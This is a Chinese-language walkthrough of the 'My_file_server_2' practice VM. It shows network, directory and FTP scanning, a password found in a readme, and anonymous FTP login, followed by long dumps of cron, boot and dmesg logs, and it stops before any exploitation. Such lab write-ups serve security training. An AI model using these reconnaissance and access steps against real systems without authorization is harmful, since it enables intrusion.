My_file_server_2
先扫一下ip
可以发现ip是192.168.59.148
扫一下端口
发现开放了8个端口
先去看看80端口
说是文件服务器
点链接进去看看
发现跳转到了国外的网站查一下
armourinfosec.com 是印度印多尔(Indore) 一家成立于2015 年的网络安全公司(ARMOUR INFOSEC PRIVATE LIMITED),核心业务是网络安全培训 + 渗透测试服务,面向学生与专业人士,主打道德黑客、渗透测试、网络安全等方向。
f12看一下html代码
发现没啥有用的信息
先扫一下目录吧
dirsearch -u "http://192.168.59.148" -i 200 -e*
发现扫描出来一个readme.txt的文件
去看看
发现他告诉我们他的密码是rootroot1
ok我们现在知道了一个密码但是不知道是谁是什么的密码
再收集一些信息
扫描一下指纹信息
whatweb -v 192.168.59.148
没啥有用的信息
测一下刚刚的ftp是否开启了匿名登录
结果判断:
✅ 成功:出现 230
❌ 失败:出现 530
nmap -p 21 --script ftp-anon 192.168.59.148
可以发现允许匿名用户登录并且文件夹权限是777
我们登录一下
ftp 192.168.59.148
name这里anonymous
提示输入密码,直接回车就行
看一下log里面的信息
下载认证日志secure 看看内容
secure :
Linux 系统认证日志,记录了所有 SSH 登录、用户认证、sudo 操作的记录。能直接找到靶机的有效系统用户名、登录成功 / 失败的记录,是找账号密码的核心文件。
get secure
发现失败了
看了一下发现只有文件的属主(root,UID=0)才有读写权限
把其他文件下载看一下
┌──(root㉿kali)-[~/桌面]
└─# cat cron
Feb 18 13:33:36 fileserver crond[469]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 83% if used.)
Feb 18 13:33:37 fileserver crond[469]: (CRON) INFO (running with inotify support)
Feb 18 15:00:10 fileserver crond[466]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 64% if used.)
Feb 18 15:00:11 fileserver crond[466]: (CRON) INFO (running with inotify support)
Feb 18 15:01:01 fileserver CROND[2159]: (root) CMD (run-parts /etc/cron.hourly)
Feb 18 15:01:01 fileserver run-parts(/etc/cron.hourly)[2159]: starting 0anacron
Feb 18 15:01:01 fileserver anacron[2168]: Anacron started on 2020-02-18
Feb 18 15:01:01 fileserver run-parts(/etc/cron.hourly)[2170]: finished 0anacron
Feb 18 15:01:01 fileserver anacron[2168]: Will run job `cron.daily' in 36 min.
Feb 18 15:01:01 fileserver anacron[2168]: Will run job `cron.weekly' in 56 min.
Feb 18 15:01:01 fileserver anacron[2168]: Will run job `cron.monthly' in 76 min.
Feb 18 15:01:01 fileserver anacron[2168]: Jobs will be executed sequentially
Feb 18 15:01:01 fileserver run-parts(/etc/cron.hourly)[2159]: starting 0yum-hourly.cron
Feb 18 15:01:01 fileserver run-parts(/etc/cron.hourly)[2176]: finished 0yum-hourly.cron
Feb 18 15:12:44 fileserver crond[460]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 19% if used.)
Feb 18 15:12:44 fileserver crond[460]: (CRON) INFO (running with inotify support)
Feb 18 15:25:22 fileserver crond[2735]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 29% if used.)
Feb 18 15:25:22 fileserver crond[2735]: (CRON) INFO (running with inotify support)
Feb 18 15:25:22 fileserver crond[2735]: (CRON) INFO (@reboot jobs will be run at computer's startup.)
Feb 18 15:48:20 fileserver crond[455]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 63% if used.)
Feb 18 15:48:20 fileserver crond[455]: (CRON) INFO (running with inotify support)
Feb 18 16:01:01 fileserver CROND[2262]: (root) CMD (run-parts /etc/cron.hourly)
Feb 18 16:01:01 fileserver run-parts(/etc/cron.hourly)[2262]: starting 0anacron
Feb 18 16:01:01 fileserver anacron[2271]: Anacron started on 2020-02-18
Feb 18 16:01:01 fileserver anacron[2271]: Will run job `cron.daily' in 20 min.
Feb 18 16:01:01 fileserver anacron[2271]: Will run job `cron.weekly' in 40 min.
Feb 18 16:01:01 fileserver anacron[2271]: Will run job `cron.monthly' in 60 min.
Feb 18 16:01:01 fileserver anacron[2271]: Jobs will be executed sequentially
Feb 18 16:01:01 fileserver run-parts(/etc/cron.hourly)[2273]: finished 0anacron
Feb 18 16:01:01 fileserver run-parts(/etc/cron.hourly)[2262]: starting 0yum-hourly.cron
Feb 18 16:01:01 fileserver run-parts(/etc/cron.hourly)[2279]: finished 0yum-hourly.cron
Feb 18 16:21:01 fileserver anacron[2271]: Job `cron.daily' started
Feb 18 16:21:01 fileserver run-parts(/etc/cron.daily)[2546]: starting 0yum-daily.cron
Feb 18 16:21:01 fileserver run-parts(/etc/cron.daily)[2553]: finished 0yum-daily.cron
Feb 18 16:21:01 fileserver run-parts(/etc/cron.daily)[2546]: starting logrotate
Feb 18 16:21:01 fileserver run-parts(/etc/cron.daily)[2560]: finished logrotate
Feb 18 16:21:01 fileserver run-parts(/etc/cron.daily)[2546]: starting man-db.cron
Feb 18 16:21:21 fileserver run-parts(/etc/cron.daily)[15744]: finished man-db.cron
Feb 18 16:21:21 fileserver anacron[2271]: Job `cron.daily' terminated
Feb 18 16:26:27 localhost crond[462]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 88% if used.)
Feb 18 16:26:27 localhost crond[462]: (CRON) INFO (running with inotify support)
Feb 18 16:39:35 localhost crond[464]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 8% if used.)
Feb 18 16:39:35 localhost crond[464]: (CRON) INFO (running with inotify support)
Feb 18 16:50:54 localhost crond[464]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 39% if used.)
Feb 18 16:50:54 localhost crond[464]: (CRON) INFO (running with inotify support)
Feb 18 16:58:49 localhost crond[464]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 94% if used.)
Feb 18 16:58:49 localhost crond[464]: (CRON) INFO (running with inotify support)
Feb 18 17:01:01 localhost CROND[1934]: (root) CMD (run-parts /etc/cron.hourly)
Feb 18 17:01:02 localhost run-parts(/etc/cron.hourly)[1934]: starting 0anacron
Feb 18 17:01:02 localhost run-parts(/etc/cron.hourly)[1943]: finished 0anacron
Feb 18 17:01:02 localhost run-parts(/etc/cron.hourly)[1934]: starting 0yum-hourly.cron
Feb 18 17:01:02 localhost run-parts(/etc/cron.hourly)[1949]: finished 0yum-hourly.cron
Feb 18 17:01:33 localhost crond[465]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 3% if used.)
Feb 18 17:01:33 localhost crond[465]: (CRON) INFO (running with inotify support)
Feb 18 17:05:35 localhost crond[469]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 97% if used.)
Feb 18 17:05:35 localhost crond[469]: (CRON) INFO (running with inotify support)
Feb 18 17:22:32 localhost crond[582]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 88% if used.)
Feb 18 17:22:32 localhost crond[582]: (CRON) INFO (running with inotify support)
Feb 18 18:08:32 localhost crond[569]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 98% if used.)
Feb 18 18:08:32 localhost crond[569]: (CRON) INFO (running with inotify support)
Feb 19 10:37:25 localhost crond[557]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 80% if used.)
Feb 19 10:37:25 localhost crond[557]: (CRON) INFO (running with inotify support)
Feb 19 10:43:59 localhost crond[2226]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 10% if used.)
Feb 19 10:43:59 localhost crond[2226]: (CRON) INFO (running with inotify support)
Feb 19 10:43:59 localhost crond[2226]: (CRON) INFO (@reboot jobs will be run at computer's startup.)
Feb 19 10:58:39 localhost crond[606]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 14% if used.)
Feb 19 10:58:39 localhost crond[606]: (CRON) INFO (running with inotify support)
Feb 19 11:01:01 localhost CROND[2038]: (root) CMD (run-parts /etc/cron.hourly)
Feb 19 11:01:02 localhost run-parts(/etc/cron.hourly)[2038]: starting 0anacron
Feb 19 11:01:02 localhost anacron[2047]: Anacron started on 2020-02-19
Feb 19 11:01:02 localhost run-parts(/etc/cron.hourly)[2049]: finished 0anacron
Feb 19 11:01:02 localhost anacron[2047]: Will run job `cron.daily' in 23 min.
Feb 19 11:01:02 localhost anacron[2047]: Will run job `cron.weekly' in 43 min.
Feb 19 11:01:02 localhost anacron[2047]: Will run job `cron.monthly' in 63 min.
Feb 19 11:01:02 localhost anacron[2047]: Jobs will be executed sequentially
Feb 19 11:01:02 localhost run-parts(/etc/cron.hourly)[2038]: starting 0yum-hourly.cron
Feb 19 11:01:02 localhost run-parts(/etc/cron.hourly)[2055]: finished 0yum-hourly.cron
Feb 19 11:54:19 localhost crond[600]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 77% if used.)
Feb 19 11:54:19 localhost crond[600]: (CRON) INFO (running with inotify support)
Feb 19 12:01:02 localhost CROND[2152]: (root) CMD (run-parts /etc/cron.hourly)
Feb 19 12:01:02 localhost run-parts(/etc/cron.hourly)[2152]: starting 0anacron
Feb 19 12:01:02 localhost anacron[2161]: Anacron started on 2020-02-19
Feb 19 12:01:02 localhost run-parts(/etc/cron.hourly)[2163]: finished 0anacron
Feb 19 12:01:02 localhost anacron[2161]: Will run job `cron.daily' in 40 min.
Feb 19 12:01:02 localhost anacron[2161]: Will run job `cron.weekly' in 60 min.
Feb 19 12:01:02 localhost anacron[2161]: Will run job `cron.monthly' in 80 min.
Feb 19 12:01:02 localhost anacron[2161]: Jobs will be executed sequentially
Feb 19 12:01:02 localhost run-parts(/etc/cron.hourly)[2152]: starting 0yum-hourly.cron
Feb 19 12:01:02 localhost run-parts(/etc/cron.hourly)[2169]: finished 0yum-hourly.cron
Feb 19 12:35:42 localhost crond[588]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 59% if used.)
Feb 19 12:35:43 localhost crond[588]: (CRON) INFO (running with inotify support)
Feb 19 12:52:11 localhost crond[577]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 52% if used.)
Feb 19 12:52:12 localhost crond[577]: (CRON) INFO (running with inotify support)
Feb 19 12:59:06 localhost crond[608]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 25% if used.)
Feb 19 12:59:06 localhost crond[608]: (CRON) INFO (running with inotify support)
Feb 19 13:01:01 localhost CROND[2062]: (root) CMD (run-parts /etc/cron.hourly)
Feb 19 13:01:01 localhost run-parts(/etc/cron.hourly)[2062]: starting 0anacron
Feb 19 13:01:01 localhost anacron[2071]: Anacron started on 2020-02-19
Feb 19 13:01:01 localhost anacron[2071]: Will run job `cron.daily' in 38 min.
Feb 19 13:01:01 localhost anacron[2071]: Will run job `cron.weekly' in 58 min.
Feb 19 13:01:01 localhost anacron[2071]: Will run job `cron.monthly' in 78 min.
Feb 19 13:01:01 localhost anacron[2071]: Jobs will be executed sequentially
Feb 19 13:01:01 localhost run-parts(/etc/cron.hourly)[2073]: finished 0anacron
Feb 19 13:01:01 localhost run-parts(/etc/cron.hourly)[2062]: starting 0yum-hourly.cron
Feb 19 13:01:01 localhost run-parts(/etc/cron.hourly)[2079]: finished 0yum-hourly.cron
Feb 19 13:12:04 localhost crond[597]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 47% if used.)
Feb 19 13:12:04 localhost crond[597]: (CRON) INFO (running with inotify support)
这个cron日志没有任何可直接利用的提权点,里面全是 Linux 系统默认的定时任务,没有自定义的、可被我们篡改的脚本
──(root㉿kali)-[~/桌面]
└─# cat boot.log
[ OK ] Started Show Plymouth Boot Screen.
[ OK ] Reached target Paths.
[ OK ] Reached target Basic System.
[ OK ] Found device VBOX_HARDDISK.
Starting File System Check on /dev/disk/by-uuid/18b0d984-25fb-4a58-a008-c0410d32b0cb...
[ OK ] Started dracut initqueue hook.
[ OK ] Reached target Remote File Systems (Pre).
[ OK ] Reached target Remote File Systems.
systemd-fsck[247]: /sbin/fsck.xfs: XFS file system.
[ OK ] Started File System Check on /dev/disk/by-uuid/18b0d984-25fb-4a58-a008-c0410d32b0cb.
Mounting /sysroot...
[ OK ] Mounted /sysroot.
[ OK ] Reached target Initrd Root File System.
Starting Reload Configuration from the Real Root...
[ OK ] Started Reload Configuration from the Real Root.
[ OK ] Reached target Initrd File Systems.
[ OK ] Reached target Initrd Default Target.
Welcome to CentOS Linux 7 (Core)!
[ OK ] Stopped Switch Root.
[ OK ] Stopped Journal Service.
Starting Journal Service...
[ OK ] Reached target Host and Network Name Lookups.
[ OK ] Listening on Delayed Shutdown Socket.
Starting Create list of required static device nodes for the current kernel...
[ OK ] Reached target Local Encrypted Volumes.
[ OK ] Listening on udev Control Socket.
Mounting Debug File System...
[ OK ] Created slice system-selinux\x2dpolicy\x2dmigrate\x2dlocal\x2dchanges.slice.
[ OK ] Listening on /dev/initctl Compatibility Named Pipe.
[ OK ] Stopped File System Check on /dev/disk/by-uuid/18b0d984-25fb-4a58-a008-c0410d32b0cb.
[ OK ] Reached target RPC Port Mapper.
[ OK ] Created slice system-getty.slice.
[ OK ] Set up automount Arbitrary Executable File Formats File System Automount Point.
Starting Remount Root and Kernel File Systems...
[ OK ] Created slice User and Session Slice.
Mounting POSIX Message Queue File System...
[ OK ] Stopped target Switch Root.
[ OK ] Stopped target Initrd File Systems.
[ OK ] Stopped target Initrd Root File System.
Starting Apply Kernel Variables...
[ OK ] Listening on udev Kernel Socket.
[ OK ] Started Forward Password Requests to Wall Directory Watch.
Starting Read and set NIS domainname from /etc/sysconfig/network...
Mounting Huge Pages File System...
Mounting NFSD configuration filesystem...
[ OK ] Reached target Slices.
[ OK ] Started Create list of required static device nodes for the current kernel.
Starting Create Static Device Nodes in /dev...
[ OK ] Started Apply Kernel Variables.
[ OK ] Mounted Debug File System.
[ OK ] Mounted POSIX Message Queue File System.
[ OK ] Mounted Huge Pages File System.
[ OK ] Started Remount Root and Kernel File Systems.
Starting udev Coldplug all Devices...
Starting Configure read-only root support...
[ OK ] Started Read and set NIS domainname from /etc/sysconfig/network.
[ OK ] Started Create Static Device Nodes in /dev.
[ OK ] Started Journal Service.
Starting Flush Journal to Persistent Storage...
[ OK ] Reached target Local File Systems (Pre).
Starting udev Kernel Device Manager...
[ OK ] Started udev Kernel Device Manager.
[ OK ] Started Flush Journal to Persistent Storage.
[ OK ] Mounted NFSD configuration filesystem.
[ OK ] Started udev Coldplug all Devices.
[ OK ] Started Configure read-only root support.
Starting Load/Save Random Seed...
[ OK ] Started Load/Save Random Seed.
[ OK ] Found device VBOX_HARDDISK 1.
Mounting /boot...
[ OK ] Found device VBOX_HARDDISK 2.
Activating swap /dev/disk/by-uuid/183bb37f-b951-46bc-9316-566e2950c04d...
[ OK ] Activated swap /dev/disk/by-uuid/183bb37f-b951-46bc-9316-566e2950c04d.
[ OK ] Reached target Swap.
[ OK ] Reached target Sound Card.
[ OK ] Mounted /boot.
[ OK ] Reached target Local File Systems.
Starting Tell Plymouth To Write Out Runtime Data...
Starting Import network configuration from initramfs...
Starting Preprocess NFS configuration...
[ OK ] Started Preprocess NFS configuration.
[ OK ] Started Import network configuration from initramfs.
Starting Create Volatile Files and Directories...
[ OK ] Started Tell Plymouth To Write Out Runtime Data.
[ OK ] Started Create Volatile Files and Directories.
Starting Security Auditing Service...
Mounting RPC Pipe File System...
[ OK ] Mounted RPC Pipe File System.
[ OK ] Reached target rpc_pipefs.target.
Starting NFSv4 ID-name mapping service...
[ OK ] Started NFSv4 ID-name mapping service.
[ OK ] Started Security Auditing Service.
Starting Update UTMP about System Boot/Shutdown...
[ OK ] Started Update UTMP about System Boot/Shutdown.
[ OK ] Reached target System Initialization.
[ OK ] Listening on D-Bus System Message Bus Socket.
[ OK ] Started Flexible branding.
[ OK ] Reached target Paths.
[ OK ] Listening on RPCbind Server Activation Socket.
Starting RPC bind service...
[ OK ] Reached target Sockets.
[ OK ] Reached target Basic System.
Starting Login Service...
Starting Dynamic System Tuning Daemon...
[ OK ] Started D-Bus System Message Bus.
Starting Network Manager...
Starting Dump dmesg to /var/log/dmesg...
Starting System Logging Service...
Starting GSSAPI Proxy Daemon...
Starting IPv4 firewall with iptables...
[ OK ] Started irqbalance daemon.
[ OK ] Started Daily Cleanup of Temporary Directories.
[ OK ] Reached target Timers.
[ OK ] Started RPC bind service.
[ OK ] Started Login Service.
[ OK ] Started Dump dmesg to /var/log/dmesg.
[ OK ] Started System Logging Service.
[ OK ] Started GSSAPI Proxy Daemon.
[ OK ] Reached target NFS client services.
[ OK ] Reached target Remote File Systems (Pre).
[ OK ] Reached target Remote File Systems.
Starting Permit User Sessions...
[ OK ] Started Network Manager.
Starting Network Manager Wait Online...
[ OK ] Started Permit User Sessions.
Starting Terminate Plymouth Boot Screen...
这个boot.log完全没有任何渗透利用价值,它只是 CentOS 7 系统的开机启动日志,里面全是系统默认的开机服务启动、文件系统挂载流程,没有任何账号密码、漏洞线索、可利用的配置
──(root㉿kali)-[~/桌面]
└─# cat dmesg
[ 0.000000] Initializing cgroup subsys cpuset
[ 0.000000] Initializing cgroup subsys cpu
[ 0.000000] Initializing cgroup subsys cpuacct
[ 0.000000] Linux version 3.10.0-229.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.2 20140120 (Red Hat 4.8.2-16) (GCC) ) #1 SMP Fri Mar 6 11:36:42 UTC 2015
[ 0.000000] Command line: BOOT_IMAGE=/vmlinuz-3.10.0-229.el7.x86_64 root=UUID=18b0d984-25fb-4a58-a008-c0410d32b0cb ro crashkernel=auto rhgb quiet LANG=en_US.UTF-8
[ 0.000000] e820: BIOS-provided physical RAM map:
[ 0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable
[ 0.000000] BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved
[ 0.000000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved
[ 0.000000] BIOS-e820: [mem 0x0000000000100000-0x00000000dffeffff] usable
[ 0.000000] BIOS-e820: [mem 0x00000000dfff0000-0x00000000dfffffff] ACPI data
[ 0.000000] BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved
[ 0.000000] BIOS-e820: [mem 0x00000000fee00000-0x00000000fee00fff] reserved
[ 0.000000] BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved
[ 0.000000] BIOS-e820: [mem 0x0000000100000000-0x000000011cffffff] usable
[ 0.000000] NX (Execute Disable) protection: active
[ 0.000000] SMBIOS 2.5 present.
[ 0.000000] DMI: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
[ 0.000000] Hypervisor detected: KVM
[ 0.000000] e820: update [mem 0x00000000-0x00000fff] usable ==> reserved
[ 0.000000] e820: remove [mem 0x000a0000-0x000fffff] usable
[ 0.000000] No AGP bridge found
[ 0.000000] e820: last_pfn = 0x11d000 max_arch_pfn = 0x400000000
[ 0.000000] MTRR default type: uncachable
[ 0.000000] MTRR variable ranges disabled:
[ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
[ 0.000000] CPU MTRRs all blank - virtualized system.
[ 0.000000] e820: last_pfn = 0xdfff0 max_arch_pfn = 0x400000000
[ 0.000000] found SMP MP-table at [mem 0x0009fff0-0x0009ffff] mapped at [ffff88000009fff0]
[ 0.000000] Base memory trampoline at [ffff880000099000] 99000 size 24576
[ 0.000000] init_memory_mapping: [mem 0x00000000-0x000fffff]
[ 0.000000] [mem 0x00000000-0x000fffff] page 4k
[ 0.000000] BRK [0x01ee5000, 0x01ee5fff] PGTABLE
[ 0.000000] BRK [0x01ee6000, 0x01ee6fff] PGTABLE
[ 0.000000] BRK [0x01ee7000, 0x01ee7fff] PGTABLE
[ 0.000000] init_memory_mapping: [mem 0x11ce00000-0x11cffffff]
[ 0.000000] [mem 0x11ce00000-0x11cffffff] page 2M
[ 0.000000] BRK [0x01ee8000, 0x01ee8fff] PGTABLE
[ 0.000000] init_memory_mapping: [mem 0x11c000000-0x11cdfffff]
[ 0.000000] [mem 0x11c000000-0x11cdfffff] page 2M
[ 0.000000] init_memory_mapping: [mem 0x100000000-0x11bffffff]
[ 0.000000] [mem 0x100000000-0x11bffffff] page 2M
[ 0.000000] init_memory_mapping: [mem 0x00100000-0xdffeffff]
[ 0.000000] [mem 0x00100000-0x001fffff] page 4k
[ 0.000000] [mem 0x00200000-0xdfdfffff] page 2M
[ 0.000000] [mem 0xdfe00000-0xdffeffff] page 4k
[ 0.000000] RAMDISK: [mem 0x3611d000-0x37086fff]
[ 0.000000] ACPI: RSDP 00000000000e0000 00024 (v02 VBOX )
[ 0.000000] ACPI: XSDT 00000000dfff0030 0003C (v01 VBOX VBOXXSDT 00000001 ASL 00000061)
[ 0.000000] ACPI: FACP 00000000dfff00f0 000F4 (v04 VBOX VBOXFACP 00000001 ASL 00000061)
[ 0.000000] ACPI: DSDT 00000000dfff0470 02325 (v02 VBOX VBOXBIOS 00000002 INTL 20191018)
[ 0.000000] ACPI: FACS 00000000dfff0200 00040
[ 0.000000] ACPI: APIC 00000000dfff0240 00054 (v02 VBOX VBOXAPIC 00000001 ASL 00000061)
[ 0.000000] ACPI: SSDT 00000000dfff02a0 001CC (v01 VBOX VBOXCPUT 00000002 INTL 20191018)
[ 0.000000] ACPI: Local APIC address 0xfee00000
[ 0.000000] No NUMA configuration found
[ 0.000000] Faking a node at [mem 0x0000000000000000-0x000000011cffffff]
[ 0.000000] Initmem setup node 0 [mem 0x00000000-0x11cffffff]
[ 0.000000] NODE_DATA [mem 0x11cfd5000-0x11cffbfff]
[ 0.000000] Reserving 161MB of memory at 704MB for crashkernel (System RAM: 4047MB)
[ 0.000000] kvm-clock: Using msrs 4b564d01 and 4b564d00
[ 0.000000] kvm-clock: cpu 0, msr 1:1cf85001, primary cpu clock
[ 4672.342621] [ffffea0000000000-ffffea00047fffff] PMD -> [ffff880118600000-ffff88011c5fffff] on node 0
[ 4672.342627] Zone ranges:
[ 4672.342628] DMA [mem 0x00001000-0x00ffffff]
[ 4672.342629] DMA32 [mem 0x01000000-0xffffffff]
[ 4672.342630] Normal [mem 0x100000000-0x11cffffff]
[ 4672.342631] Movable zone start for each node
[ 4672.342633] Early memory node ranges
[ 4672.342634] node 0: [mem 0x00001000-0x0009efff]
[ 4672.342635] node 0: [mem 0x00100000-0xdffeffff]
[ 4672.342635] node 0: [mem 0x100000000-0x11cffffff]
[ 4672.342637] On node 0 totalpages: 1036174
[ 4672.342638] DMA zone: 64 pages used for memmap
[ 4672.342639] DMA zone: 21 pages reserved
[ 4672.342639] DMA zone: 3998 pages, LIFO batch:0
[ 4672.342719] DMA32 zone: 14272 pages used for memmap
[ 4672.342720] DMA32 zone: 913392 pages, LIFO batch:31
[ 4672.358179] Normal zone: 1856 pages used for memmap
[ 4672.358181] Normal zone: 118784 pages, LIFO batch:31
[ 4672.360366] ACPI: PM-Timer IO Port: 0x4008
[ 4672.360367] ACPI: Local APIC address 0xfee00000
[ 4672.360377] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
[ 4672.360380] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
[ 4672.360419] IOAPIC[0]: apic_id 1, version 32, address 0xfec00000, GSI 0-23
[ 4672.360421] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
[ 4672.360422] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 low level)
[ 4672.360423] ACPI: IRQ0 used by override.
[ 4672.360423] ACPI: IRQ2 used by override.
[ 4672.360424] ACPI: IRQ9 used by override.
[ 4672.360426] Using ACPI (MADT) for SMP configuration information
[ 4672.360428] smpboot: Allowing 1 CPUs, 0 hotplug CPUs
[ 4672.360467] nr_irqs_gsi: 40
[ 4672.360495] PM: Registered nosave memory: [mem 0x0009f000-0x0009ffff]
[ 4672.360496] PM: Registered nosave memory: [mem 0x000a0000-0x000effff]
[ 4672.360496] PM: Registered nosave memory: [mem 0x000f0000-0x000fffff]
[ 4672.360497] PM: Registered nosave memory: [mem 0xdfff0000-0xdfffffff]
[ 4672.360498] PM: Registered nosave memory: [mem 0xe0000000-0xfebfffff]
[ 4672.360498] PM: Registered nosave memory: [mem 0xfec00000-0xfec00fff]
[ 4672.360499] PM: Registered nosave memory: [mem 0xfec01000-0xfedfffff]
[ 4672.360499] PM: Registered nosave memory: [mem 0xfee00000-0xfee00fff]
[ 4672.360500] PM: Registered nosave memory: [mem 0xfee01000-0xfffbffff]
[ 4672.360500] PM: Registered nosave memory: [mem 0xfffc0000-0xffffffff]
[ 4672.360502] e820: [mem 0xe0000000-0xfebfffff] available for PCI devices
[ 4672.360503] Booting paravirtualized kernel on KVM
[ 4672.360504] Detected CPU family 6 model 158
[ 4672.360505] Warning: Intel CPU model - this hardware has not undergone upstream testing. Please consult http://wiki.centos.org/FAQ for more information
[ 4672.360508] setup_percpu: NR_CPUS:5120 nr_cpumask_bits:1 nr_cpu_ids:1 nr_node_ids:1
[ 4672.360659] PERCPU: Embedded 28 pages/cpu @ffff88011cc00000 s82752 r8192 d23744 u2097152
[ 4672.360662] pcpu-alloc: s82752 r8192 d23744 u2097152 alloc=1*2097152
[ 4672.360663] pcpu-alloc: [0] 0
[ 4672.360675] Built 1 zonelists in Node order, mobility grouping on. Total pages: 1019961
[ 4672.360676] Policy zone: Normal
[ 4672.360676] Kernel command line: BOOT_IMAGE=/vmlinuz-3.10.0-229.el7.x86_64 root=UUID=18b0d984-25fb-4a58-a008-c0410d32b0cb ro crashkernel=auto rhgb quiet LANG=en_US.UTF-8
[ 4672.362393] PID hash table entries: 4096 (order: 3, 32768 bytes)
[ 4672.362415] xsave: enabled xstate_bv 0x7, cntxt size 0x340
[ 4672.369492] Checking aperture...
[ 4672.386619] No AGP bridge found
[ 4672.397991] Memory: 3816244k/4669440k available (6244k kernel code, 524744k absent, 328452k reserved, 4178k data, 1604k init)
[ 4672.398263] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=1, Nodes=1
[ 4672.398293] Hierarchical RCU implementation.
[ 4672.398294] RCU restricting CPUs from NR_CPUS=5120 to nr_cpu_ids=1.
[ 4672.398295] Experimental no-CBs for all CPUs
[ 4672.398296] Experimental no-CBs CPUs: 0.
[ 4672.398299] NR_IRQS:327936 nr_irqs:256 16
[ 4672.408678] Console: colour VGA+ 80x25
[ 4672.409144] console [tty0] enabled
[ 4672.411553] allocated 16777216 bytes of page_cgroup
[ 4672.411555] please try 'cgroup_disable=memory' option if you don't want memory cgroups
[ 4672.411739] tsc: Detected 2807.994 MHz processor
[ 4672.411742] Calibrating delay loop (skipped) preset value.. 5615.98 BogoMIPS (lpj=2807994)
[ 4672.411744] pid_max: default: 32768 minimum: 301
[ 4672.411772] Security Framework initialized
[ 4672.411776] SELinux: Initializing.
[ 4672.411780] SELinux: Starting in permissive mode
[ 4672.412151] Dentry cache hash table entries: 524288 (order: 10, 4194304 bytes)
[ 4672.413100] Inode-cache hash table entries: 262144 (order: 9, 2097152 bytes)
[ 4672.413465] Mount-cache hash table entries: 4096
[ 4672.413618] Initializing cgroup subsys memory
[ 4672.413623] Initializing cgroup subsys devices
[ 4672.413624] Initializing cgroup subsys freezer
[ 4672.413625] Initializing cgroup subsys net_cls
[ 4672.413626] Initializing cgroup subsys blkio
[ 4672.413627] Initializing cgroup subsys perf_event
[ 4672.413628] Initializing cgroup subsys hugetlb
[ 4672.413705] CPU: Physical Processor ID: 0
[ 4672.414790] mce: CPU supports 0 MCE banks
[ 4672.414812] Last level iTLB entries: 4KB 0, 2MB 0, 4MB 0
Last level dTLB entries: 4KB 64, 2MB 0, 4MB 0
tlb_flushall_shift: 6
[ 4672.428184] Freeing SMP alternatives: 24k freed
[ 4672.434572] ACPI: Core revision 20130517
[ 4672.435105] ACPI: All ACPI Tables successfully acquired
[ 4672.435160] ftrace: allocating 23909 entries in 94 pages
[ 4672.463541] Enabling x2apic
[ 4672.463547] Enabled x2apic
[ 4672.463712] Switched APIC routing to physical x2apic.
[ 4672.464700] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1
[ 4672.464705] smpboot: CPU0: Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz (fam: 06, model: 9e, stepping: 09)
[ 4672.560974] APIC calibration not consistent with PM-Timer: 106ms instead of 100ms
[ 4672.560975] APIC delta adjusted to PM-Timer: 6366681 (6811766)
[ 4672.561130] Performance Events: unsupported p6 CPU model 158 no PMU driver, software events only.
[ 4672.563074] KVM setup paravirtual spinlock
[ 4672.563805] Brought up 1 CPUs
[ 4672.563806] smpboot: Total of 1 processors activated (5615.98 BogoMIPS)
[ 4672.564034] NMI watchdog: disabled (cpu0): hardware events not enabled
[ 4672.564073] devtmpfs: initialized
[ 4672.565501] EVM: security.selinux
[ 4672.565502] EVM: security.ima
[ 4672.565503] EVM: security.capability
[ 4672.566105] atomic64 test passed for x86-64 platform with CX8 and with SSE
[ 4672.566213] NET: Registered protocol family 16
[ 4672.566349] ACPI: bus type PCI registered
[ 4672.566350] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5
[ 4672.566467] PCI: Using configuration type 1 for base access
[ 4672.567300] ACPI: Added _OSI(Module Device)
[ 4672.567302] ACPI: Added _OSI(Processor Device)
[ 4672.567303] ACPI: Added _OSI(3.0 _SCP Extensions)
[ 4672.567304] ACPI: Added _OSI(Processor Aggregator Device)
[ 4672.567548] ACPI: EC: Look up EC in DSDT
[ 4672.567701] ACPI: Executed 1 blocks of module-level executable AML code
[ 4672.568937] ACPI: Interpreter enabled
[ 4672.568940] ACPI Exception: AE_NOT_FOUND, While evaluating Sleep State [\_S1_] (20130517/hwxface-571)
[ 4672.568942] ACPI Exception: AE_NOT_FOUND, While evaluating Sleep State [\_S2_] (20130517/hwxface-571)
[ 4672.568944] ACPI Exception: AE_NOT_FOUND, While evaluating Sleep State [\_S3_] (20130517/hwxface-571)
[ 4672.568946] ACPI Exception: AE_NOT_FOUND, While evaluating Sleep State [\_S4_] (20130517/hwxface-571)
